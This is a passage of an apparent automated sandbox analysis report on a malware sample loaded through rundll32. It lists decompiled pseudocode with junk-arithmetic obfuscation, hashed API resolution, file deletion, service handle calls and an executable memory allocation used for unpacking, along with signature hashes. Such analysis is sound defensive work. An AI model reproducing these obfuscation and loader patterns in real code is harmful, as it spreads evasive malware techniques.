                                                                      				_v12 = _v12 + 0xffffbec0;
                                                                      				_v12 = _v12 ^ 0x9b5a0da8;
                                                                      				_t50 = E00367378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
                                                                      				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
                                                                      				return _t51;
                                                                      			}













                                                                      APIs
                                                                      • SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 0037428A
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleInformation
                                                                      • String ID:
                                                                      • API String ID: 3935143524-0
                                                                      • Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction ID: 5956e9fd12d3565c8b6595b7ab99ba736f1b4f546748380c20ff77c99a94e207
                                                                      • Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction Fuzzy Hash: E0115E71D00308BFEB15DFE4CC4AAEEBBB5EF44710F108088E9246A291D7B55B109F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00365AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t47;
                                                                      				int _t57;
                                                                      				signed int _t59;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				E00372550(_t47);
                                                                      				_v20 = 0xc8c;
                                                                      				_v20 = _v20 + 0xffffaa04;
                                                                      				_v20 = _v20 ^ 0xb702763d;
                                                                      				_v20 = _v20 ^ 0x48fdd1a6;
                                                                      				_v16 = 0xeb1c;
                                                                      				_v16 = _v16 << 4;
                                                                      				_t59 = 0xf;
                                                                      				_v16 = _v16 * 0xe;
                                                                      				_v16 = _v16 + 0xffff64c4;
                                                                      				_v16 = _v16 ^ 0x00cd6bec;
                                                                      				_v12 = 0x757;
                                                                      				_v12 = _v12 ^ 0x4183b2e4;
                                                                      				_v12 = _v12 << 2;
                                                                      				_v12 = _v12 / _t59;
                                                                      				_v12 = _v12 ^ 0x0067440e;
                                                                      				_v8 = 0xa082;
                                                                      				_v8 = _v8 >> 1;
                                                                      				_v8 = _v8 >> 8;
                                                                      				_v8 = _v8 ^ 0xcec43627;
                                                                      				_v8 = _v8 ^ 0xcec45939;
                                                                      				E00367378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
                                                                      				_t57 = CloseServiceHandle(_a12); // executed
                                                                      				return _t57;
                                                                      			}











                                                                      APIs
                                                                      • CloseServiceHandle.SECHOST(48FDD1A6), ref: 00365B77
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleService
                                                                      • String ID:
                                                                      • API String ID: 1725840886-0
                                                                      • Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction ID: c22610fc99d1190bab5217965dffddb57928a4adb0ff94024d36376845dbbf81
                                                                      • Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction Fuzzy Hash: 28110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F508599E525A6291D7B99B15DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E0036E554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t42;
                                                                      				int _t51;
                                                                      				signed int _t53;
                                                                      				struct _SHFILEOPSTRUCTW* _t57;
                                                                      
                                                                      				_push(_a4);
                                                                      				_t57 = __edx;
                                                                      				_push(__edx);
                                                                      				E00372550(_t42);
                                                                      				_v20 = 0xead4;
                                                                      				_v20 = _v20 + 0xffff9be4;
                                                                      				_v20 = _v20 ^ 0x000085bc;
                                                                      				_v16 = 0x46f7;
                                                                      				_v16 = _v16 << 0xe;
                                                                      				_v16 = _v16 << 7;
                                                                      				_t53 = 0x39;
                                                                      				_v16 = _v16 / _t53;
                                                                      				_v16 = _v16 ^ 0x03e8aab4;
                                                                      				_v12 = 0x2beb;
                                                                      				_v12 = _v12 ^ 0xafae01c3;
                                                                      				_v12 = _v12 + 0xffff58eb;
                                                                      				_v12 = _v12 ^ 0xa5118136;
                                                                      				_v12 = _v12 ^ 0x0abc415f;
                                                                      				_v8 = 0xa691;
                                                                      				_v8 = _v8 ^ 0x7591c523;
                                                                      				_v8 = _v8 << 0xa;
                                                                      				_v8 = _v8 + 0x20df;
                                                                      				_v8 = _v8 ^ 0x458ea297;
                                                                      				E00367378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
                                                                      				_t51 = SHFileOperationW(_t57); // executed
                                                                      				return _t51;
                                                                      			}












                                                                      APIs
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 0036E60B
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileOperation
                                                                      • String ID:
                                                                      • API String ID: 3080627654-0
                                                                      • Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction ID: 37c16b350633fe484ff561c77a503795dee2fce76da759ef270c5068000918ff
                                                                      • Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction Fuzzy Hash: 821123B1D01318BBEB18DFA5C84A8DEBBB4FB01718F10C598E82576241E3B95B44DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E0036EB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t34;
                                                                      				int _t44;
                                                                      
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00372550(_t34);
                                                                      				_v8 = 0xd1b2;
                                                                      				_v8 = _v8 * 0x63;
                                                                      				_v8 = _v8 << 4;
                                                                      				_v8 = _v8 * 0x74;
                                                                      				_v8 = _v8 ^ 0x4bec8e88;
                                                                      				_v20 = 0x1fc5;
                                                                      				_v20 = _v20 + 0x9c84;
                                                                      				_v20 = _v20 ^ 0x0000b099;
                                                                      				_v16 = 0x542c;
                                                                      				_v16 = _v16 | 0x3ba7d0a3;
                                                                      				_v16 = _v16 ^ 0x3ba7e6ce;
                                                                      				_v12 = 0x8319;
                                                                      				_v12 = _v12 * 0x45;
                                                                      				_v12 = _v12 + 0xffff39a4;
                                                                      				_v12 = _v12 ^ 0x0022b84c;
                                                                      				E00367378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
                                                                      				_t44 = DeleteFileW(_a8); // executed
                                                                      				return _t44;
                                                                      			}










                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(3BA7E6CE), ref: 0036EBC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction ID: 4486d7639447a4f67ca5764f3b9804def74a30e2b5a83d628e4e1fae2c67f08d
                                                                      • Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction Fuzzy Hash: 5B11E3B1C0020DFBDF04DFE4DA4689EBBB4FB40314F60C589E814AA2A1D7749B549F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E0036F1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t46;
                                                                      				int _t57;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				E00372550(_t46);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0x28beb0;
                                                                      				_v16 = 0xe97b;
                                                                      				_v16 = _v16 >> 3;
                                                                      				_t59 = 0x47;
                                                                      				_v16 = _v16 / _t59;
                                                                      				_v16 = _v16 ^ 0x00001a39;
                                                                      				_v12 = 0x2d01;
                                                                      				_v12 = _v12 >> 8;
                                                                      				_t60 = 0x3a;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 ^ 0x000023d3;
                                                                      				_v20 = 0xc5d9;
                                                                      				_v20 = _v20 | 0x3e7a6da8;
                                                                      				_v20 = _v20 ^ 0x3e7ad9f3;
                                                                      				_v8 = 0x3ddd;
                                                                      				_v8 = _v8 >> 7;
                                                                      				_v8 = _v8 + 0xffffadd9;
                                                                      				_v8 = _v8 ^ 0xffff8e91;
                                                                      				E00367378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
                                                                      				_t57 = CloseHandle(_a12); // executed
                                                                      				return _t57;
                                                                      			}














                                                                      APIs
                                                                      • CloseHandle.KERNEL32(3E7AD9F3), ref: 0036F2A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction ID: c3ef44ec563041582890030ef0f4c325384d348d1014864b96a0c09584b47509
                                                                      • Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction Fuzzy Hash: 3C1114B6D0020CEBDF05CFE5C80A9DEBBB5EB14308F10C589E914AA290D3B59B649F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00388361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0038839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003883A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: d28cd9aed57ea9c45d1823d3c69cad849b607cb82e83fc281fd2631f59e8d42d
                                                                      • Instruction ID: b9d5dc2cc537aeb595dfa58a2f7b17309ac1b175c473482a7c005aa478bd3986
                                                                      • Opcode Fuzzy Hash: d28cd9aed57ea9c45d1823d3c69cad849b607cb82e83fc281fd2631f59e8d42d
                                                                      • Instruction Fuzzy Hash: 0C11BE79601705AFD722AF649C45BABB7ECEF49B14F404569ED46DB240DBF0B8048BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 003885E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0038860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00388615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 9eeae7699befa46b0cc6a04f87642009484f0e6592815932c7d5cc9a5e4f6eb3
                                                                      • Instruction ID: bed6c0242929587e12559e07d23379a0c60ff481c257b6a509ac5695922696fe
                                                                      • Opcode Fuzzy Hash: 9eeae7699befa46b0cc6a04f87642009484f0e6592815932c7d5cc9a5e4f6eb3
                                                                      • Instruction Fuzzy Hash: 40311EB2A01209AFDB12EFA4CC45EEF77BCAF45300F514566FA15D7200EB34E9008BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00388471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0038847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: 211bb749113e46851851033a82ce3c16d8919346a3b43fdcafc70e5c587ebddb
                                                                      • Instruction ID: 8c2a15cc65f73c9e033e43e1618cd35d2a96a369d2e758175bf1f76ab7dece53
                                                                      • Opcode Fuzzy Hash: 211bb749113e46851851033a82ce3c16d8919346a3b43fdcafc70e5c587ebddb
                                                                      • Instruction Fuzzy Hash: 4B1122326017069FD722EF62DC46BA7B7ECEF09320F904469ED55CB281DB71B8408BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00388545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00388550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: 6ac9b47c2b1e77ee1d37078e2a2bd194027e5c719be7b5b17dbc007d5b4a1985
                                                                      • Instruction ID: df3c399169a3c68558dc32f2e6512579fc804c63d69764ff03aec6c4ac0c1942
                                                                      • Opcode Fuzzy Hash: 6ac9b47c2b1e77ee1d37078e2a2bd194027e5c719be7b5b17dbc007d5b4a1985
                                                                      • Instruction Fuzzy Hash: 6E112271A517089FD722EF608C46BA7B7ECEF0A310F44496AED05CB240DBB1B804CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 003882E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003882F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 524dd97cb9fff9841bb89cea9e099352b8d63a48daeb77d98b30a2143e42115d
                                                                      • Instruction ID: 55335f1eff62a7b6ea1f9c8d85e18403f193323e7b84f182472403011aa98e1b
                                                                      • Opcode Fuzzy Hash: 524dd97cb9fff9841bb89cea9e099352b8d63a48daeb77d98b30a2143e42115d
                                                                      • Instruction Fuzzy Hash: C501F43D201308AFDB126F50DC45F9E7B99FB44B50F844065F984CB211CBB1BC008BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 003881C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003881CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: 5c824fc1a297a8825bfeb034bf0ea84ec9f7a9700016d102787e0963ecd90669
                                                                      • Instruction ID: 52be576ff56db0b63b84d159e3e709410122556cb7d3f6b8b41079a71b5e9c5d
                                                                      • Opcode Fuzzy Hash: 5c824fc1a297a8825bfeb034bf0ea84ec9f7a9700016d102787e0963ecd90669
                                                                      • Instruction Fuzzy Hash: B60181312003159BD722AB14DC8AF57B79DEB40799F9580A2ED04CB203CF71EC428BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 003C2B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 003C2BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 003C2BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 003C2BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 2e180e9d3ade54670169f7a24d40a8c152579fed7c84bca98cd128507c2cc4b3
                                                                      • Instruction ID: 4e4e58555d3558bbec8170b0cde5ece3838b37e07ea24a1acafeaff4853d9fba
                                                                      • Opcode Fuzzy Hash: 2e180e9d3ade54670169f7a24d40a8c152579fed7c84bca98cd128507c2cc4b3
                                                                      • Instruction Fuzzy Hash: 1D21F975204240DFDB46DF68C8C1F6AB7E8AB49310F158199F998CF2A6D771EC40CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 003C14BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0<$`
                                                                      • API String ID: 701148680-2576692213
                                                                      • Opcode ID: 23fd684d3383a714ca76b21fd09e84a790c19668e97b4c67217e5e4e672341b1
                                                                      • Instruction ID: e7f0c6b4a0ce94ca8c271489672c4b9b7645655afb69b50693858466a23db77d
                                                                      • Opcode Fuzzy Hash: 23fd684d3383a714ca76b21fd09e84a790c19668e97b4c67217e5e4e672341b1
                                                                      • Instruction Fuzzy Hash: 30518B76B002198BCB16DE6CD985EAE73F9EB4A350F154028FD05D7746CA34ED11D7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00388110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: d29f205c81a2cb3518e49a9076dc74cee6d3fe4435e9ce747cf4f932b3967696
                                                                      • Instruction ID: 0c03d45b4d751cf049c652a47bfe61f53065b819b2ac35688fd1dfbc67cd5239
                                                                      • Opcode Fuzzy Hash: d29f205c81a2cb3518e49a9076dc74cee6d3fe4435e9ce747cf4f932b3967696
                                                                      • Instruction Fuzzy Hash: B0F0B4302253415ADB137B34DDCEA22354FAB82330FE08BB1E1258A6D5CE3999428359
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 46 3d3928-3d39b4 call 3b79dc 51 3d39bd-3d39cf GetEnhMetaFileA 46->51 52 3d39b6 46->52 54 3d39d8-3d39ec 51->54 55 3d39d1 51->55 52->51 56 3d3a0e-3d3ac5 VirtualAlloc 54->56 57 3d39ee-3d3a0c 54->57 55->54 65 3d3acf-3d3ada 56->65 57->56 66 3d3adc-3d3b1f 65->66 67 3d3b21-3d3b33 65->67 66->65 68 3d3b75-3d3bac 67->68 69 3d3b35-3d3b73 67->69 69->68 69->69
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 003D39C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,003D6CB4,00001000,00000040), ref: 003D3A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|l=
                                                                      • API String ID: 2643768156-3697153081
                                                                      • Opcode ID: 41114418611ba0ffa1c4070e4cc754ec6857df54afbf950ad9b71aa96dd5cc96
                                                                      • Instruction ID: 56b183d423b761421adc479f5d8e064c3359fb159d262e8f46aa8be55856636e
                                                                      • Opcode Fuzzy Hash: 41114418611ba0ffa1c4070e4cc754ec6857df54afbf950ad9b71aa96dd5cc96
                                                                      • Instruction Fuzzy Hash: 5B61A9B56632009FD763DF68FD83A1937AAF708705F00802BE1A98B361DB75A944CF05
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 71 3804c7-380565 call 377378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E003804C7() {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _t48;
                                                                      				signed int _t49;
                                                                      
                                                                      				_v8 = 0xb3b9;
                                                                      				_v8 = _v8 + 0x1dd8;
                                                                      				_v8 = _v8 >> 0xa;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 ^ 0x000002ef;
                                                                      				_v20 = 0x5082;
                                                                      				_t48 = 0xc;
                                                                      				_v20 = _v20 / _t48;
                                                                      				_v20 = _v20 ^ 0x00006c35;
                                                                      				_v12 = 0x710;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_t49 = 0x6d;
                                                                      				_v12 = _v12 / _t49;
                                                                      				_v12 = _v12 ^ 0x0000532a;
                                                                      				_v16 = 0x5a4c;
                                                                      				_v16 = _v16 ^ 0xca4a1f4d;
                                                                      				_v16 = _v16 ^ 0xca4a24cd;
                                                                      				E00377378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
                                                                      				ExitProcess(0);
                                                                      			}










                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 00380560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                      • Associated: 00000011.00000002.2109747843.0000000000390000.00000040.00020000.sdmp
                                                                      • Associated: 00000011.00000002.2109761138.0000000000392000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_370000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: 0d41bd97411ec4cb34f43b319a146abd1516b65ae15cca8f6a3f67bc878e38b9
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: F911F771E0520CEBEB04DFE4D84AADEBBB1EB50714F10C189E414AB284D7F96B548F81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 74 3d1638-3d1641 75 3d164b-3d16d1 DdeInitializeA call 3d1328 call 3d1a14 74->75 76 3d1643 74->76 86 3d16d6-3d16eb 75->86 76->75
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 003D1686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 3fb1c78c8d9ad12cf9b4b33eba7f6812679bcdf19175cfb62c44aa5bc1fdf7c5
                                                                      • Instruction ID: 3c38743f6130d6f8d239f1772fee38b68a66139816607619c910f4c361a6ef27
                                                                      • Opcode Fuzzy Hash: 3fb1c78c8d9ad12cf9b4b33eba7f6812679bcdf19175cfb62c44aa5bc1fdf7c5
                                                                      • Instruction Fuzzy Hash: FA119171604700AFD733EB74AD82A4E77F9AF05B40F909865F804DF751EA39EA049750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 88 44eb40-44eb93 VirtualProtect 89 44eb95-44eba1 88->89 90 44eba6-44ec17 88->90 91 44ec3a-44ec85 call 44e7a0 call 44e7e0 89->91 90->91 108 44ec19-44ec37 90->108 98 44ec90-44ec9a 91->98 100 44ec9c-44eca3 98->100 101 44ecf8-44ed4a call 44e920 98->101 102 44eca5-44ecac 100->102 103 44eced-44ecf6 100->103 111 44ed4c-44ed50 101->111 112 44ed78-44ed7f 101->112 102->103 106 44ecae-44ecea call 44e7e0 102->106 103->98 106->103 108->91 111->112 116 44ed52-44ed75 call 44e880 111->116 113 44ed8a-44ed94 112->113 117 44ede6-44ee1b call 44f000 113->117 118 44ed96-44ed9d 113->118 116->112 120 44ed9f-44eda6 118->120 121 44eddb-44ede4 118->121 120->121 124 44eda8-44edd9 call 44ee20 VirtualProtect 120->124 121->113 124->121
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0044EB8F
